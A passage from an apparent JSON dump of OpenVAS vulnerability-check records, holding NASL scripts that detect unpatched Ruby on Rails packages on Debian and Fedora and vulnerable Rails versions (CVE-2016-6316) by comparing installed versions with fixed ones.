isdpkgvuln(pkg:\"rails\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activesupport-2.3\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-rails\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-24T12:55:18", "description": "Multiple security issues have been\ndiscovered in the Ruby on Rails web application development framework, which may\nresult in denial of service, cross-site scripting, information disclosure or\nbypass of input validation.", "cvss3": {}, "published": "2016-02-05T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3464-1 (rails - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7577", "CVE-2015-3227", "CVE-2015-7576", "CVE-2016-0751", "CVE-2015-7581", "CVE-2016-0753", "CVE-2015-3226", "CVE-2016-0752"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703464", "href": "http://plugins.openvas.org/nasl.php?oid=703464", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3464.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3464-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703464);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2015-3226\", \"CVE-2015-3227\", \"CVE-2015-7576\", \"CVE-2015-7577\",\n \"CVE-2015-7581\", \"CVE-2016-0751\", \"CVE-2016-0752\", \"CVE-2016-0753\");\n script_name(\"Debian Security Advisory DSA 3464-1 (rails - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-05 13:14:24 +0530 (Fri, 05 Feb 2016)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3464.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"rails on Debian Linux\");\n script_tag(name: \"insight\", value: \"Rails is a full-stack, open-source\nweb framework in Ruby for writing real-world applications.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 2:4.1.8-1+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.1-1.\n\nWe recommend that you upgrade your rails packages.\");\n script_tag(name: \"summary\", value: \"Multiple security issues have been\ndiscovered in the Ruby on Rails web application development framework, which may\nresult in denial of service, cross-site scripting, information disclosure or\nbypass of input validation.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"rails\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activesupport-2.3\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-rails\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:35:28", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-08-27T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actionview FEDORA-2016-ab8bf51cf3", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310809171", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809171", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actionview FEDORA-2016-ab8bf51cf3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809171\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-27 05:53:27 +0200 (Sat, 27 Aug 2016)\");\n script_cve_id(\"CVE-2016-6316\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actionview FEDORA-2016-ab8bf51cf3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionview'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actionview on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-ab8bf51cf3\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WHYGEL6GEXD5GMJSM2FCGFAPH4NJAWH3\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actionview\", rpm:\"rubygem-actionview~4.2.3~6.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-07-21T21:53:46", "description": "This host is running Ruby on Rails and is\n prone to cross site scripting vulnerability.", "cvss3": {}, "published": "2016-10-13T00:00:00", "type": "openvas", "title": "Ruby on Rails Action View Cross Site Scripting Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6316"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310807379", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807379", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby on Rails Action View Cross Site Scripting Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807379\");\n script_version(\"2020-07-14T14:33:06+0000\");\n script_cve_id(\"CVE-2016-6316\");\n script_bugtraq_id(92430);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:33:06 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-13 14:29:50 +0530 (Thu, 13 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Ruby on Rails Action View Cross Site Scripting Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is running Ruby on Rails and is\n prone to cross site scripting vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to the Text declared as\n 'HTML safe' when passed as an attribute value to a tag helper will not have\n quotes escaped which can lead to an XSS attack.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to inject arbitrary web script or HTML via crafted parameters.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails 3.x before 3.2.22.3,\n Ruby on Rails 4.x before 4.2.7.1 and\n Ruby on Rails 5.x before 5.0.0.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Ruby on Rails 3.2.22.3 or 4.2.7.1 or\n 5.0.0.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/oss-sec/2016/q3/260\");\n script_xref(name:\"URL\", value:\"https://groups.google.com/forum/#!msg/rubyonrails-security/I-VWr034ouk/gGu2FrCwDAAJ\");\n script_xref(name:\"URL\", value:\"http://weblog.rubyonrails.org/2016/8/11/Rails-5-0-0-1-4-2-7-2-and-3-2-22-3-have-been-released\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude( \"version_func.inc\" );\ninclude( \"host_details.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nVULN = FALSE;\n\nif( version =~ \"^(3\\.)\" )\n{\n if( version_is_less( version: version, test_version: \"3.2.22.3\" ) )\n {\n fix = \"3.2.22.3\";\n VULN = TRUE;\n }\n}\n\nelse if( version =~ \"^(4\\.)\" )\n{\n if( version_is_less( version: version, test_version: \"4.2.7.1\" ) )\n {\n fix = \"4.2.7.1\";\n VULN = TRUE;\n }\n}\n\nelse if( version =~ \"^(5\\.)\" )\n{\n if( version_is_less( version: version, test_version: \"5.0.0.1\" ) )\n {\n fix = \"5.0.0.1\";\n VULN = TRUE;\n }\n}\n\nif( VULN )\n{\n report = report_fixed_ver( installed_version: version, fixed_version: fix, install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:19", "description": "Andrew Carpenter of Critical Juncture\ndiscovered a cross-site scripting vulnerability affecting Action View in rails,\na web application framework written in Ruby. Text declared as HTML safe\nwill not have quotes escaped when used as attribute values in tag helpers.", "cvss3": {}, "published": "2016-08-25T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3651-1 (rails - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6316"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703651", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703651", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3651.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3651-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703651\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-6316\");\n script_name(\"Debian Security Advisory DSA 3651-1 (rails - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-25 00:00:00 +0200 (Thu, 25 Aug 2016)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3651.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"rails on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthis problem has been fixed in version 2:4.1.8-1+deb8u4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:4.2.7.1-1.\n\nWe recommend that you upgrade your rails packages.\");\n script_tag(name:\"summary\", value:\"Andrew Carpenter of Critical Juncture\ndiscovered a cross-site scripting vulnerability affecting Action View in rails,\na web application framework written in Ruby. Text declared as HTML safe\nwill not have quotes escaped when used as attribute values in tag helpers.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"rails\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activesupport-2.3\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-rails\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-24T12:55:10", "description": "Andrew Carpenter of Critical Juncture\ndiscovered a cross-site scripting vulnerability affecting Action View in rails,\na web application framework written in Ruby. Text declared as HTML safe \nwill not have quotes escaped when used as attribute values in tag helpers.", "cvss3": {}, "published": "2016-08-25T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3651-1 (rails - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6316"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703651", "href": "http://plugins.openvas.org/nasl.php?oid=703651", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3651.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3651-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703651);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-6316\");\n script_name(\"Debian Security Advisory DSA 3651-1 (rails - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-08-25 00:00:00 +0200 (Thu, 25 Aug 2016)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3651.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"rails on Debian Linux\");\n script_tag(name: \"insight\", value: \"Rails is a full-stack, open-source web\nframework in Ruby for writing real-world applications.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthis problem has been fixed in version 2:4.1.8-1+deb8u4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:4.2.7.1-1.\n\nWe recommend that you upgrade your rails packages.\");\n script_tag(name: \"summary\", value: \"Andrew Carpenter of Critical Juncture\ndiscovered a cross-site scripting vulnerability affecting Action View in rails,\na web application framework written in Ruby. Text declared as HTML safe \nwill not have quotes escaped when used as attribute values in tag helpers.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"rails\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activesupport-2.3\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-rails\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2020-07-21T21:54:04", "description": "This host is running Ruby on Rails and is\n prone to cross site scripting vulnerability.", "cvss3": {}, "published": "2016-10-13T00:00:00", "type": "openvas", "title": "Ruby on Rails Action View Cross Site Scripting Vulnerability (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6316"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310807380", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807380", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby on Rails Action View Cross Site Scripting Vulnerability (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807380\");\n script_version(\"2020-07-14T14:33:06+0000\");\n script_cve_id(\"CVE-2016-6316\");\n script_bugtraq_id(92430);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:33:06 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-13 14:29:55 +0530 (Thu, 13 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Ruby on Rails Action View Cross Site Scripting Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is running Ruby on Rails and is\n prone to cross site scripting vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to the Text declared as\n 'HTML safe' when passed as an attribute value to a tag helper will not have\n quotes escaped which can lead to an XSS attack.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to inject arbitrary web script or HTML via crafted parameters.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails 3.x before 3.2.22.3,\n Ruby on Rails 4.x before 4.2.7.1 and\n Ruby on Rails 5.x before 5.0.0.1 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Ruby on Rails 3.2.22.3 or 4.2.7.1 or\n 5.0.0.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/oss-sec/2016/q3/260\");\n script_xref(name:\"URL\", value:\"https://groups.google.com/forum/#!msg/rubyonrails-security/I-VWr034ouk/gGu2FrCwDAAJ\");\n 